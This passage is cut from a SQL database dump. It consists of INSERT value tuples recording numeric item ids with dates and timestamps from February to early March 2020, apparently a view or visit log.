00:02:43'),(1146,80,1,'2020-02-09','2020-02-09 00:43:15'),(1147,2609,1,'2020-02-09','2020-02-09 01:43:17'),(1148,2309,1,'2020-02-09','2020-02-09 03:13:16'),(1149,2309,1,'2020-02-09','2020-02-09 03:33:32'),(1150,1730,1,'2020-02-09','2020-02-09 06:57:09'),(1151,2609,1,'2020-02-09','2020-02-09 12:10:15'),(1152,2309,1,'2020-02-09','2020-02-09 14:27:44'),(1153,108,1,'2020-02-09','2020-02-09 18:07:50'),(1154,2309,1,'2020-02-09','2020-02-09 20:33:26'),(1155,2609,1,'2020-02-09','2020-02-09 23:04:01'),(1156,80,1,'2020-02-10','2020-02-10 07:48:30'),(1157,80,1,'2020-02-10','2020-02-10 07:48:45'),(1158,87,1,'2020-02-10','2020-02-10 10:11:58'),(1159,488,1,'2020-02-10','2020-02-10 10:15:54'),(1160,87,1,'2020-02-10','2020-02-10 10:47:18'),(1161,87,1,'2020-02-10','2020-02-10 10:51:57'),(1162,488,1,'2020-02-10','2020-02-10 10:55:55'),(1163,89,1,'2020-02-10','2020-02-10 11:04:02'),(1164,108,1,'2020-02-10','2020-02-10 11:09:19'),(1165,2309,1,'2020-02-10','2020-02-10 13:21:05'),(1166,89,1,'2020-02-10','2020-02-10 13:39:12'),(1167,68,1,'2020-02-10','2020-02-10 13:39:49'),(1168,76,1,'2020-02-10','2020-02-10 13:40:07'),(1169,2904,1,'2020-02-10','2020-02-10 13:40:15'),(1170,2809,1,'2020-02-10','2020-02-10 15:48:10'),(1171,87,1,'2020-02-10','2020-02-10 16:07:26'),(1172,473,1,'2020-02-10','2020-02-10 16:09:24'),(1173,84,1,'2020-02-10','2020-02-10 16:10:51'),(1174,68,1,'2020-02-10','2020-02-10 16:17:10'),(1175,87,1,'2020-02-10','2020-02-10 16:17:14'),(1176,482,1,'2020-02-10','2020-02-10 16:17:22'),(1177,2309,1,'2020-02-11','2020-02-11 06:48:25'),(1178,74,1,'2020-02-11','2020-02-11 08:49:11'),(1179,2503,1,'2020-02-11','2020-02-11 08:49:44'),(1180,1737,1,'2020-02-11','2020-02-11 14:30:20'),(1181,1610,1,'2020-02-11','2020-02-11 18:53:53'),(1182,2609,1,'2020-02-11','2020-02-11 23:15:59'),(1183,2309,1,'2020-02-12','2020-02-12 04:50:17'),(1184,72,1,'2020-02-12','2020-02-12 05:40:51'),(1185,108,1,'2020-02-12','2020-02-12 06:41:02'),(1186,2309,1,'2020-02-12','2020-02-12 07:25:45'),(1187,2801,1,'2020-02-12','2020-02-12 12:42:58'),(1188,2609,1,'2020-02-12','2020-02-12 16:12:07'),(1189,570,1,'2020-02-12','2020-02-12 17:06:43'),(1190,570,1,'2020-02-12','2020-02-12 17:06:49'),(1191,570,1,'2020-02-12','2020-02-12 17:06:49'),(1192,68,1,'2020-02-12','2020-02-12 17:26:51'),(1193,84,1,'2020-02-12','2020-02-12 17:31:00'),(1194,1877,1,'2020-02-12','2020-02-12 17:31:24'),(1195,76,1,'2020-02-12','2020-02-12 17:33:03'),(1196,1604,1,'2020-02-12','2020-02-12 17:34:07'),(1197,108,1,'2020-02-12','2020-02-12 17:38:49'),(1198,2309,1,'2020-02-13','2020-02-13 02:27:43'),(1199,1730,1,'2020-02-13','2020-02-13 04:08:37'),(1200,2801,1,'2020-02-13','2020-02-13 05:48:49'),(1201,2309,1,'2020-02-13','2020-02-13 12:05:19'),(1202,2309,1,'2020-02-13','2020-02-13 17:43:19'),(1203,1747,1,'2020-02-13','2020-02-13 18:23:53'),(1204,1588,1,'2020-02-14','2020-02-14 15:26:40'),(1205,2658,1,'2020-02-14','2020-02-14 18:00:14'),(1206,1596,1,'2020-02-14','2020-02-14 18:27:03'),(1207,2309,1,'2020-02-14','2020-02-14 20:07:40'),(1208,1604,1,'2020-02-14','2020-02-14 21:15:47'),(1209,2911,1,'2020-02-14','2020-02-14 21:57:05'),(1210,1730,1,'2020-02-14','2020-02-14 22:08:10'),(1211,80,1,'2020-02-15','2020-02-15 05:00:20'),(1212,2309,1,'2020-02-15','2020-02-15 05:20:14'),(1213,2801,1,'2020-02-15','2020-02-15 05:50:15'),(1214,1730,1,'2020-02-15','2020-02-15 07:04:13'),(1215,2609,1,'2020-02-15','2020-02-15 07:54:45'),(1216,2309,1,'2020-02-15','2020-02-15 08:04:35'),(1217,89,1,'2020-02-15','2020-02-15 11:36:08'),(1218,2911,1,'2020-02-15','2020-02-15 12:06:43'),(1219,335,1,'2020-02-15','2020-02-15 12:56:30'),(1220,80,1,'2020-02-15','2020-02-15 13:26:37'),(1221,80,1,'2020-02-15','2020-02-15 14:06:35'),(1222,2309,1,'2020-02-15','2020-02-15 14:27:00'),(1223,2801,1,'2020-02-15','2020-02-15 14:37:31'),(1224,1741,1,'2020-02-15','2020-02-15 15:39:29'),(1225,2751,1,'2020-02-15','2020-02-15 15:58:14'),(1226,72,1,'2020-02-15','2020-02-15 16:08:25'),(1227,2769,1,'2020-02-15','2020-02-15 16:38:36'),(1228,2609,1,'2020-02-15','2020-02-15 16:48:45'),(1229,1730,1,'2020-02-15','2020-02-15 17:08:46'),(1230,89,1,'2020-02-15','2020-02-15 18:48:55'),(1231,2813,1,'2020-02-15','2020-02-15 18:59:16'),(1232,108,1,'2020-02-15','2020-02-15 20:17:49'),(1233,1588,1,'2020-02-16','2020-02-16 04:49:34'),(1234,2309,1,'2020-02-16','2020-02-16 11:25:16'),(1235,108,1,'2020-02-16','2020-02-16 13:05:46'),(1236,2934,1,'2020-02-16','2020-02-16 14:09:34'),(1237,2801,1,'2020-02-16','2020-02-16 14:36:53'),(1238,80,1,'2020-02-16','2020-02-16 14:46:16'),(1239,80,1,'2020-02-16','2020-02-16 15:06:41'),(1240,1730,1,'2020-02-16','2020-02-16 15:26:55'),(1241,72,1,'2020-02-16','2020-02-16 17:41:08'),(1242,2309,1,'2020-02-16','2020-02-16 20:39:28'),(1243,80,1,'2020-02-16','2020-02-16 21:41:38'),(1244,91,1,'2020-02-16','2020-02-16 21:42:20'),(1245,2609,1,'2020-02-16','2020-02-16 22:01:09'),(1246,80,1,'2020-02-17','2020-02-17 05:06:19'),(1247,72,1,'2020-02-17','2020-02-17 13:16:52'),(1248,2934,1,'2020-02-17','2020-02-17 13:17:40'),(1249,335,1,'2020-02-17','2020-02-17 13:18:12'),(1250,108,1,'2020-02-17','2020-02-17 14:28:36'),(1251,91,1,'2020-02-17','2020-02-17 14:43:49'),(1252,89,1,'2020-02-17','2020-02-17 15:46:42'),(1253,91,1,'2020-02-17','2020-02-17 16:28:30'),(1254,2309,1,'2020-02-17','2020-02-17 17:23:40'),(1255,2801,1,'2020-02-17','2020-02-17 18:34:52'),(1256,80,1,'2020-02-18','2020-02-18 01:38:40'),(1257,2609,1,'2020-02-18','2020-02-18 02:21:57'),(1258,108,1,'2020-02-18','2020-02-18 07:18:31'),(1259,2309,1,'2020-02-18','2020-02-18 09:05:26'),(1260,2309,1,'2020-02-18','2020-02-18 10:51:50'),(1261,89,1,'2020-02-18','2020-02-18 10:52:22'),(1262,2309,1,'2020-02-18','2020-02-18 10:53:54'),(1263,1612,1,'2020-02-18','2020-02-18 10:56:05'),(1264,87,1,'2020-02-18','2020-02-18 10:57:00'),(1265,84,1,'2020-02-18','2020-02-18 11:04:45'),(1266,87,1,'2020-02-18','2020-02-18 11:07:16'),(1267,87,1,'2020-02-18','2020-02-18 11:07:33'),(1268,89,1,'2020-02-18','2020-02-18 11:07:56'),(1269,89,1,'2020-02-18','2020-02-18 11:08:10'),(1270,1612,1,'2020-02-18','2020-02-18 11:08:35'),(1271,89,1,'2020-02-18','2020-02-18 11:09:14'),(1272,89,1,'2020-02-18','2020-02-18 11:10:30'),(1273,1612,1,'2020-02-18','2020-02-18 11:11:16'),(1274,91,1,'2020-02-18','2020-02-18 11:14:24'),(1275,89,1,'2020-02-18','2020-02-18 11:16:11'),(1276,89,1,'2020-02-18','2020-02-18 11:18:22'),(1277,1604,1,'2020-02-18','2020-02-18 11:19:19'),(1278,1604,1,'2020-02-18','2020-02-18 11:19:30'),(1279,89,1,'2020-02-18','2020-02-18 11:20:06'),(1280,1612,1,'2020-02-18','2020-02-18 11:23:03'),(1281,2748,1,'2020-02-18','2020-02-18 11:23:10'),(1282,89,1,'2020-02-18','2020-02-18 11:24:12'),(1283,1612,1,'2020-02-18','2020-02-18 11:24:25'),(1284,108,1,'2020-02-18','2020-02-18 11:25:06'),(1285,89,1,'2020-02-18','2020-02-18 11:28:56'),(1286,91,1,'2020-02-18','2020-02-18 11:43:02'),(1287,91,1,'2020-02-18','2020-02-18 11:59:48'),(1288,1747,1,'2020-02-18','2020-02-18 12:00:03'),(1289,72,1,'2020-02-18','2020-02-18 12:01:35'),(1290,91,1,'2020-02-18','2020-02-18 12:05:48'),(1291,1612,1,'2020-02-18','2020-02-18 12:10:12'),(1292,2609,1,'2020-02-18','2020-02-18 12:20:51'),(1293,1612,1,'2020-02-18','2020-02-18 14:28:49'),(1294,1720,1,'2020-02-18','2020-02-18 15:41:39'),(1295,74,1,'2020-02-18','2020-02-18 16:22:09'),(1296,2801,1,'2020-02-18','2020-02-18 17:11:01'),(1297,89,1,'2020-02-18','2020-02-18 18:19:20'),(1298,89,1,'2020-02-18','2020-02-18 18:19:48'),(1299,89,1,'2020-02-18','2020-02-18 18:36:57'),(1300,2965,1,'2020-02-18','2020-02-18 18:37:17'),(1301,2965,1,'2020-02-18','2020-02-18 18:38:03'),(1302,91,1,'2020-02-18','2020-02-18 21:00:40'),(1303,91,1,'2020-02-18','2020-02-18 22:02:41'),(1304,2751,1,'2020-02-18','2020-02-18 23:51:42'),(1305,1588,1,'2020-02-19','2020-02-19 12:24:42'),(1306,108,1,'2020-02-19','2020-02-19 14:20:14'),(1307,2309,1,'2020-02-20','2020-02-20 11:54:08'),(1308,2309,1,'2020-02-20','2020-02-20 12:31:50'),(1309,89,1,'2020-02-20','2020-02-20 13:23:38'),(1310,91,1,'2020-02-20','2020-02-20 13:24:11'),(1311,89,1,'2020-02-20','2020-02-20 13:50:10'),(1312,91,1,'2020-02-20','2020-02-20 15:29:23'),(1313,2309,1,'2020-02-20','2020-02-20 17:20:26'),(1314,87,1,'2020-02-20','2020-02-20 18:03:16'),(1315,2309,1,'2020-02-20','2020-02-20 18:20:42'),(1316,2309,1,'2020-02-20','2020-02-20 18:29:47'),(1317,80,1,'2020-02-20','2020-02-20 22:00:04'),(1318,2609,1,'2020-02-20','2020-02-20 23:50:15'),(1319,2801,1,'2020-02-21','2020-02-21 00:44:59'),(1320,91,1,'2020-02-21','2020-02-21 04:01:40'),(1321,2309,1,'2020-02-21','2020-02-21 05:22:16'),(1322,1730,1,'2020-02-21','2020-02-21 07:08:23'),(1323,80,1,'2020-02-21','2020-02-21 07:51:57'),(1324,488,1,'2020-02-21','2020-02-21 08:20:52'),(1325,2658,1,'2020-02-21','2020-02-21 09:34:30'),(1326,2801,1,'2020-02-21','2020-02-21 09:35:24'),(1327,72,1,'2020-02-21','2020-02-21 09:43:33'),(1328,2934,1,'2020-02-21','2020-02-21 09:43:52'),(1329,72,1,'2020-02-21','2020-02-21 09:44:08'),(1330,2557,1,'2020-02-21','2020-02-21 09:44:42'),(1331,2557,1,'2020-02-21','2020-02-21 09:52:42'),(1332,72,1,'2020-02-21','2020-02-21 09:52:48'),(1333,2971,1,'2020-02-21','2020-02-21 09:53:01'),(1334,2971,1,'2020-02-21','2020-02-21 09:53:38'),(1335,72,1,'2020-02-21','2020-02-21 09:53:58'),(1336,2557,1,'2020-02-21','2020-02-21 09:54:00'),(1337,72,1,'2020-02-21','2020-02-21 09:54:01'),(1338,72,1,'2020-02-21','2020-02-21 09:56:37'),(1339,2971,1,'2020-02-21','2020-02-21 09:56:49'),(1340,2971,1,'2020-02-21','2020-02-21 09:57:09'),(1341,2971,1,'2020-02-21','2020-02-21 09:57:42'),(1342,2971,1,'2020-02-21','2020-02-21 09:57:51'),(1343,2971,1,'2020-02-21','2020-02-21 10:07:01'),(1344,72,1,'2020-02-21','2020-02-21 10:08:36'),(1345,2971,1,'2020-02-21','2020-02-21 10:08:41'),(1346,76,1,'2020-02-21','2020-02-21 10:14:27'),(1347,2801,1,'2020-02-21','2020-02-21 10:14:32'),(1348,76,1,'2020-02-21','2020-02-21 10:16:09'),(1349,1600,1,'2020-02-21','2020-02-21 12:36:09'),(1350,89,1,'2020-02-21','2020-02-21 17:23:56'),(1351,2974,1,'2020-02-21','2020-02-21 17:24:12'),(1352,89,1,'2020-02-21','2020-02-21 17:25:19'),(1353,89,1,'2020-02-21','2020-02-21 17:25:30'),(1354,91,1,'2020-02-21','2020-02-21 17:26:20'),(1355,89,1,'2020-02-21','2020-02-21 17:26:29'),(1356,2977,1,'2020-02-21','2020-02-21 17:32:07'),(1357,89,1,'2020-02-21','2020-02-21 17:40:59'),(1358,2977,1,'2020-02-21','2020-02-21 17:41:10'),(1359,30,1,'2020-02-21','2020-02-21 17:41:43'),(1360,2977,1,'2020-02-21','2020-02-21 17:43:55'),(1361,89,1,'2020-02-21','2020-02-21 18:04:57'),(1362,2977,1,'2020-02-21','2020-02-21 18:05:17'),(1363,2309,1,'2020-02-21','2020-02-21 18:06:13'),(1364,1747,1,'2020-02-21','2020-02-21 18:34:36'),(1365,80,1,'2020-02-21','2020-02-21 18:36:43'),(1366,2801,1,'2020-02-21','2020-02-21 20:04:26'),(1367,1588,1,'2020-02-21','2020-02-21 20:57:43'),(1368,2801,1,'2020-02-21','2020-02-21 22:57:58'),(1369,1718,1,'2020-02-22','2020-02-22 16:34:30'),(1370,80,1,'2020-02-22','2020-02-22 16:51:55'),(1371,2309,1,'2020-02-22','2020-02-22 17:20:39'),(1372,1747,1,'2020-02-22','2020-02-22 18:19:58'),(1373,89,1,'2020-02-22','2020-02-22 18:39:01'),(1374,80,1,'2020-02-22','2020-02-22 20:41:29'),(1375,1600,1,'2020-02-22','2020-02-22 21:12:02'),(1376,2609,1,'2020-02-23','2020-02-23 03:15:40'),(1377,2309,1,'2020-02-23','2020-02-23 08:59:56'),(1378,1730,1,'2020-02-23','2020-02-23 16:31:56'),(1379,1730,1,'2020-02-23','2020-02-23 16:32:00'),(1380,1730,1,'2020-02-23','2020-02-23 16:32:01'),(1381,1730,1,'2020-02-23','2020-02-23 16:32:02'),(1382,1730,1,'2020-02-23','2020-02-23 16:32:02'),(1383,1776,1,'2020-02-23','2020-02-23 16:38:21'),(1384,1582,1,'2020-02-23','2020-02-23 17:20:23'),(1385,1582,1,'2020-02-23','2020-02-23 17:23:13'),(1386,2420,1,'2020-02-24','2020-02-24 00:42:30'),(1387,2309,1,'2020-02-24','2020-02-24 01:53:45'),(1388,2801,1,'2020-02-24','2020-02-24 02:53:48'),(1389,2658,1,'2020-02-24','2020-02-24 04:11:17'),(1390,1588,1,'2020-02-24','2020-02-24 07:04:22'),(1391,1730,1,'2020-02-24','2020-02-24 09:35:12'),(1392,2309,1,'2020-02-24','2020-02-24 10:25:39'),(1393,474,1,'2020-02-24','2020-02-24 10:59:12'),(1394,470,1,'2020-02-24','2020-02-24 11:54:38'),(1395,2801,1,'2020-02-24','2020-02-24 13:15:16'),(1396,91,1,'2020-02-24','2020-02-24 13:46:57'),(1397,1713,1,'2020-02-24','2020-02-24 13:48:59'),(1398,91,1,'2020-02-24','2020-02-24 13:49:05'),(1399,89,1,'2020-02-24','2020-02-24 13:49:26'),(1400,1544,1,'2020-02-24','2020-02-24 13:50:45'),(1401,89,1,'2020-02-24','2020-02-24 13:51:23'),(1402,2457,1,'2020-02-24','2020-02-24 13:51:34'),(1403,91,1,'2020-02-24','2020-02-24 14:15:25'),(1404,91,1,'2020-02-24','2020-02-24 14:24:38'),(1405,2984,1,'2020-02-24','2020-02-24 14:57:45'),(1406,91,1,'2020-02-24','2020-02-24 15:02:07'),(1407,91,1,'2020-02-24','2020-02-24 15:13:47'),(1408,91,1,'2020-02-24','2020-02-24 17:30:45'),(1409,1718,1,'2020-02-24','2020-02-24 17:31:43'),(1410,91,1,'2020-02-24','2020-02-24 17:32:36'),(1411,1720,1,'2020-02-24','2020-02-24 17:34:21'),(1412,91,1,'2020-02-24','2020-02-24 17:34:28'),(1413,108,1,'2020-02-25','2020-02-25 05:41:27'),(1414,1600,1,'2020-02-25','2020-02-25 07:51:47'),(1415,84,1,'2020-02-25','2020-02-25 10:32:51'),(1416,87,1,'2020-02-25','2020-02-25 10:35:49'),(1417,89,1,'2020-02-25','2020-02-25 10:36:42'),(1418,1606,1,'2020-02-25','2020-02-25 10:38:03'),(1419,89,1,'2020-02-25','2020-02-25 10:41:12'),(1420,89,1,'2020-02-25','2020-02-25 10:42:21'),(1421,91,1,'2020-02-25','2020-02-25 10:57:50'),(1422,2751,1,'2020-02-25','2020-02-25 10:59:14'),(1423,91,1,'2020-02-25','2020-02-25 10:59:44'),(1424,80,1,'2020-02-25','2020-02-25 11:14:02'),(1425,91,1,'2020-02-25','2020-02-25 11:19:05'),(1426,72,1,'2020-02-25','2020-02-25 11:53:08'),(1427,2904,1,'2020-02-25','2020-02-25 11:55:11'),(1428,76,1,'2020-02-25','2020-02-25 11:56:35'),(1429,74,1,'2020-02-25','2020-02-25 11:57:03'),(1430,2309,1,'2020-02-25','2020-02-25 13:04:14'),(1431,74,1,'2020-02-25','2020-02-25 16:26:39'),(1432,469,1,'2020-02-25','2020-02-25 16:28:52'),(1433,467,1,'2020-02-25','2020-02-25 16:28:58'),(1434,2984,1,'2020-02-25','2020-02-25 16:31:23'),(1435,2984,1,'2020-02-25','2020-02-25 16:31:32'),(1436,2984,1,'2020-02-25','2020-02-25 16:31:32'),(1437,2984,1,'2020-02-25','2020-02-25 16:31:33'),(1438,2984,1,'2020-02-25','2020-02-25 16:31:37'),(1439,1728,1,'2020-02-25','2020-02-25 16:32:22'),(1440,1728,1,'2020-02-25','2020-02-25 16:32:38'),(1441,1728,1,'2020-02-25','2020-02-25 16:32:38'),(1442,1728,1,'2020-02-25','2020-02-25 16:32:38'),(1443,1728,1,'2020-02-25','2020-02-25 16:32:41'),(1444,2984,1,'2020-02-25','2020-02-25 16:32:58'),(1445,89,1,'2020-02-26','2020-02-26 00:13:38'),(1446,1606,1,'2020-02-26','2020-02-26 00:14:01'),(1447,91,1,'2020-02-26','2020-02-26 00:15:59'),(1448,2985,1,'2020-02-26','2020-02-26 00:17:33'),(1449,91,1,'2020-02-26','2020-02-26 00:17:43'),(1450,91,1,'2020-02-26','2020-02-26 00:19:03'),(1451,91,1,'2020-02-26','2020-02-26 00:20:00'),(1452,2985,1,'2020-02-26','2020-02-26 00:20:45'),(1453,2985,1,'2020-02-26','2020-02-26 00:21:03'),(1454,91,1,'2020-02-26','2020-02-26 00:22:20'),(1455,91,1,'2020-02-26','2020-02-26 00:29:14'),(1456,91,1,'2020-02-26','2020-02-26 00:40:10'),(1457,91,1,'2020-02-26','2020-02-26 00:48:37'),(1458,2993,1,'2020-02-26','2020-02-26 00:49:24'),(1459,91,1,'2020-02-26','2020-02-26 00:50:22'),(1460,2993,1,'2020-02-26','2020-02-26 00:50:37'),(1461,91,1,'2020-02-26','2020-02-26 00:53:29'),(1462,91,1,'2020-02-26','2020-02-26 00:53:33'),(1463,91,1,'2020-02-26','2020-02-26 00:56:00'),(1464,91,1,'2020-02-26','2020-02-26 09:45:38'),(1465,89,1,'2020-02-26','2020-02-26 09:48:41'),(1466,91,1,'2020-02-26','2020-02-26 10:05:42'),(1467,89,1,'2020-02-26','2020-02-26 10:07:52'),(1468,80,1,'2020-02-26','2020-02-26 10:41:49'),(1469,80,1,'2020-02-26','2020-02-26 10:45:55'),(1470,91,1,'2020-02-26','2020-02-26 10:50:00'),(1471,91,1,'2020-02-26','2020-02-26 11:58:02'),(1472,2769,1,'2020-02-26','2020-02-26 14:29:48'),(1473,89,1,'2020-02-26','2020-02-26 15:45:14'),(1474,2769,1,'2020-02-26','2020-02-26 15:46:11'),(1475,89,1,'2020-02-26','2020-02-26 16:18:30'),(1476,2964,1,'2020-02-26','2020-02-26 16:21:13'),(1477,89,1,'2020-02-26','2020-02-26 16:21:59'),(1478,1612,1,'2020-02-26','2020-02-26 16:22:13'),(1479,1612,1,'2020-02-26','2020-02-26 16:28:08'),(1480,89,1,'2020-02-26','2020-02-26 16:31:05'),(1481,2964,1,'2020-02-26','2020-02-26 16:36:27'),(1482,1612,1,'2020-02-26','2020-02-26 16:55:06'),(1483,89,1,'2020-02-26','2020-02-26 16:57:58'),(1484,2964,1,'2020-02-26','2020-02-26 16:58:04'),(1485,89,1,'2020-02-26','2020-02-26 16:59:37'),(1486,2964,1,'2020-02-26','2020-02-26 16:59:58'),(1487,89,1,'2020-02-26','2020-02-26 17:28:00'),(1488,89,1,'2020-02-26','2020-02-26 17:39:09'),(1489,89,1,'2020-02-26','2020-02-26 17:52:01'),(1490,3005,1,'2020-02-26','2020-02-26 17:52:12'),(1491,91,1,'2020-02-27','2020-02-27 08:34:44'),(1492,1582,1,'2020-02-27','2020-02-27 10:39:26'),(1493,89,1,'2020-02-27','2020-02-27 15:30:17'),(1494,1604,1,'2020-02-27','2020-02-27 17:34:41'),(1495,2309,1,'2020-02-28','2020-02-28 07:52:05'),(1496,89,1,'2020-02-28','2020-02-28 13:16:19'),(1497,80,1,'2020-02-28','2020-02-28 13:35:00'),(1498,91,1,'2020-02-28','2020-02-28 13:52:48'),(1499,1728,1,'2020-02-28','2020-02-28 16:09:14'),(1500,2991,1,'2020-02-28','2020-02-28 16:10:12'),(1501,2993,1,'2020-02-28','2020-02-28 16:11:16'),(1502,2989,1,'2020-02-28','2020-02-28 16:13:18'),(1503,80,1,'2020-02-28','2020-02-28 17:22:45'),(1504,2309,1,'2020-02-28','2020-02-28 17:39:47'),(1505,1600,1,'2020-02-28','2020-02-28 18:20:39'),(1506,2801,1,'2020-02-28','2020-02-28 18:39:39'),(1507,1730,1,'2020-02-28','2020-02-28 19:30:19'),(1508,80,1,'2020-02-28','2020-02-28 19:40:25'),(1509,2609,1,'2020-02-28','2020-02-28 20:21:02'),(1510,2309,1,'2020-02-28','2020-02-28 20:50:50'),(1511,89,1,'2020-02-28','2020-02-28 21:10:47'),(1512,2964,1,'2020-02-28','2020-02-28 21:17:41'),(1513,335,1,'2020-02-28','2020-02-28 21:20:40'),(1514,3006,1,'2020-02-28','2020-02-28 21:21:09'),(1515,2965,1,'2020-02-28','2020-02-28 21:24:41'),(1516,68,1,'2020-02-28','2020-02-28 21:30:49'),(1517,3004,1,'2020-02-28','2020-02-28 21:58:31'),(1518,2813,1,'2020-02-28','2020-02-28 22:00:36'),(1519,72,1,'2020-02-28','2020-02-28 22:20:49'),(1520,1588,1,'2020-02-28','2020-02-28 22:30:59'),(1521,2911,1,'2020-02-28','2020-02-28 22:41:12'),(1522,1730,1,'2020-02-29','2020-02-29 02:01:26'),(1523,2309,1,'2020-02-29','2020-02-29 02:42:15'),(1524,2769,1,'2020-02-29','2020-02-29 03:11:23'),(1525,2801,1,'2020-02-29','2020-02-29 04:23:26'),(1526,2751,1,'2020-02-29','2020-02-29 04:42:16'),(1527,80,1,'2020-02-29','2020-02-29 06:21:36'),(1528,89,1,'2020-02-29','2020-02-29 07:01:42'),(1529,72,1,'2020-02-29','2020-02-29 08:21:37'),(1530,1588,1,'2020-02-29','2020-02-29 09:52:41'),(1531,2609,1,'2020-02-29','2020-02-29 10:12:28'),(1532,335,1,'2020-02-29','2020-02-29 11:14:20'),(1533,2801,1,'2020-02-29','2020-02-29 12:15:07'),(1534,80,1,'2020-02-29','2020-02-29 12:15:53'),(1535,2309,1,'2020-02-29','2020-02-29 12:51:12'),(1536,2813,1,'2020-02-29','2020-02-29 13:51:29'),(1537,2971,1,'2020-02-29','2020-02-29 15:13:42'),(1538,2801,1,'2020-02-29','2020-02-29 15:51:12'),(1539,1730,1,'2020-02-29','2020-02-29 16:51:14'),(1540,2911,1,'2020-02-29','2020-02-29 17:28:46'),(1541,80,1,'2020-02-29','2020-02-29 18:02:37'),(1542,72,1,'2020-02-29','2020-02-29 18:58:24'),(1543,1588,1,'2020-02-29','2020-02-29 19:08:30'),(1544,89,1,'2020-02-29','2020-02-29 19:49:08'),(1545,2769,1,'2020-02-29','2020-02-29 20:19:08'),(1546,2309,1,'2020-02-29','2020-02-29 20:49:48'),(1547,2609,1,'2020-02-29','2020-02-29 20:59:49'),(1548,335,1,'2020-02-29','2020-02-29 22:10:34'),(1549,1600,1,'2020-02-29','2020-02-29 22:40:51'),(1550,1588,1,'2020-02-29','2020-02-29 22:48:50'),(1551,1600,1,'2020-02-29','2020-02-29 23:14:19'),(1552,1730,1,'2020-02-29','2020-02-29 23:51:17'),(1553,2751,1,'2020-03-01','2020-03-01 00:31:34'),(1554,80,1,'2020-03-01','2020-03-01 00:41:30'),(1555,2609,1,'2020-03-01','2020-03-01 01:01:19'),(1556,1586,1,'2020-03-01','2020-03-01 01:21:29'),(1557,80,1,'2020-03-01','2020-03-01 02:52:08'),(1558,1596,1,'2020-03-01','2020-03-01 03:02:19'),(1559,2956,1,'2020-03-01','2020-03-01 07:16:36'),(1560,1588,1,'2020-03-01','2020-03-01 16:26:04'),(1561,1588,1,'2020-03-01','2020-03-01 16:32:13'),(1562,2609,1,'2020-03-01','2020-03-01 22:14:58'),(1563,2609,1,'2020-03-01','2020-03-01 22:16:37'),(1564,2956,1,'2020-03-02','2020-03-02 02:52:32'),(1565,2309,1,'2020-03-02','2020-03-02 05:30:23'),(1566,570,1,'2020-03-02','2020-03-02 09:10:40'),(1567,1600,1,'2020-03-02','2020-03-02 11:36:55'),(1568,1774,1,'2020-03-02','2020-03-02 11:37:42'),(1569,1600,1,'2020-03-02','2020-03-02 11:38:57'),(1570,89,1,'2020-03-02','2020-03-02 11:51:33'),(1571,89,1,'2020-03-02','2020-03-02 14:23:59'),(1572,89,1,'2020-03-02','2020-03-02 14:31:11'),(1573,1709,1,'2020-03-02','2020-03-02 14:49:24'),(1574,89,1,'2020-03-02','2020-03-02 14:56:14'),(1575,89,1,'2020-03-02','2020-03-02 14:58:12'),(1576,1606,1,'2020-03-02','2020-03-02 15:19:05'),(1577,1600,1,'2020-03-02','2020-03-02 16:01:38'),(1578,1600,1,'2020-03-02','2020-03-02 16:57:48'),(1579,89,1,'2020-03-02','2020-03-02 17:30:08'),(1580,89,1,'2020-03-02','2020-03-02 17:33:20'),(1581,1709,1,'2020-03-03','2020-03-03 05:59:10'),(1582,1606,1,'2020-03-03','2020-03-03 06:25:47'),(1583,1741,1,'2020-03-03','2020-03-03 06:25:58'),(1584,2309,1,'2020-03-03','2020-03-03 06:58:45'),(1585,2609,1,'2020-03-03','2020-03-03 08:46:52'),(1586,2609,1,'2020-03-03','2020-03-03 11:17:22'),(1587,2309,1,'2020-03-03','2020-03-03 12:22:52'),(1588,91,1,'2020-03-03','2020-03-03 14:57:58'),(1589,1606,1,'2020-03-03','2020-03-03 16:01:21'),(1590,89,1,'2020-03-03','2020-03-03 16:38:13'),(1591,3023,1,'2020-03-03','2020-03-03 16:51:52'),(1592,3030,1,'2020-03-03','2020-03-03 16:52:35'),(1593,3027,1,'2020-03-03','2020-03-03 16:53:02'),(1594,2309,1,'2020-03-03','2020-03-03 17:30:29'),(1595,89,1,'2020-03-03','2020-03-03 20:11:41'),(1596,1588,1,'2020-03-03','2020-03-03 21:29:23'),(1597,76,1,'2020-03-03','2020-03-03 21:29:27'),(1598,1588,1,'2020-03-03','2020-03-03 21:29:56'),(1599,1709,1,'2020-03-03','2020-03-03 21:54:22'),(1600,80,1,'2020-03-03','2020-03-03 23:05:05'),(1601,2309,1,'2020-03-03','2020-03-03 23:43:02'),(1602,2309,1,'2020-03-04','2020-03-04 03:42:06'),(1603,89,1,'2020-03-04','2020-03-04 07:35:41'),(1604,1766,1,'2020-03-04','2020-03-04 11:47:53'),(1605,1766,1,'2020-03-04','2020-03-04 11:50:50'),(1606,1766,1,'2020-03-04','2020-03-04 11:52:07'),(1607,1766,1,'2020-03-04','2020-03-04 11:53:47'),(1608,89,1,'2020-03-04','2020-03-04 11:55:12'),(1609,76,1,'2020-03-04','2020-03-04 11:57:44'),(1610,89,1,'2020-03-04','2020-03-04 11:58:53'),(1611,1766,1,'2020-03-04','2020-03-04 11:58:56'),(1612,91,1,'2020-03-04','2020-03-04 11:59:09'),(1613,1766,1,'2020-03-04','2020-03-04 12:03:29'),(1614,3023,1,'2020-03-04','2020-03-04 12:09:27'),(1615,2956,1,'2020-03-04','2020-03-04 12:13:00'),(1616,3023,1,'2020-03-04','2020-03-04 12:14:27'),(1617,108,1,'2020-03-04','2020-03-04 12:18:59'),(1618,335,1,'2020-03-04','2020-03-04 12:41:33'),(1619,2503,1,'2020-03-04','2020-03-04 12:43:16'),(1620,68,1,'2020-03-04','2020-03-04 12:43:36'),(1621,2609,1,'2020-03-04','2020-03-04 15:33:17'),(1622,84,1,'2020-03-04','2020-03-04 15:35:53'),(1623,87,1,'2020-03-04','2020-03-04 15:39:44'),(1624,473,1,'2020-03-04','2020-03-04 15:40:03'),(1625,570,1,'2020-03-04','2020-03-04 18:15:44'),(1626,1588,1,'2020-03-05','2020-03-05 10:48:33'),(1627,2309,1,'2020-03-05','2020-03-05 12:10:31'),(1628,80,1,'2020-03-05','2020-03-05 12:18:02'),(1629,84,1,'2020-03-05','2020-03-05 12:18:13'),(1630,89,1,'2020-03-05','2020-03-05 12:20:47'),(1631,1608,1,'2020-03-05','2020-03-05 12:22:12'),(1632,3030,1,'2020-03-05','2020-03-05 12:23:59'),(1633,74,1,'2020-03-05','2020-03-05 12:24:14'),(1634,74,1,'2020-03-05','2020-03-05 12:24:46'),(1635,2956,1,'2020-03-05','2020-03-05 12:24:53'),(1636,80,1,'2020-03-05','2020-03-05 